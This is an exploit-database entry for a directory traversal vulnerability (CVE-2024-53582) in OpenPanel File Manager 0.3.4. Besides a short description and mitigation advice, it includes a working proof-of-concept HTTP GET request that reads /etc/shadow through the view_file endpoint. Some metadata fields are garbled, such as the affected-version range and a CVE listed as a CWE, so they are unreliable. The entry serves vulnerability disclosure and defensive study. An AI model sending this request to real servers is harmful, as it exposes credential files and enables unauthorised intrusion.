OpenPanel File Manager 0.3.4 - Directory Traversal Vulnerability

vendor:

File Manager

by:

Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee

6.1

CVSS

HIGH

Directory Traversal

CWE

Product Name: File Manager

Affected Version From: 2000.3.4

Affected Version To: 36589

Patch Exists: NO

Related CWE: CVE-2024-53582

CPE: openpanel_file_manager:0.3.4

Metasploit:

Other Scripts:

Platforms Tested: macOS

2024

OpenPanel File Manager 0.3.4 – Directory Traversal Vulnerability

The OpenPanel File Manager version 0.3.4 is vulnerable to a directory traversal exploit. By sending a crafted GET request to view_file with the filename parameter set to 'shadow' and path_param set to '/etc', an attacker can access sensitive system files outside the intended directory. This vulnerability has been assigned CVE-2024-53582.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software as soon as one becomes available. Additionally, access to the File Manager should be restricted to authorized users only.

Source

Exploit-DB raw data:

# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582

GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers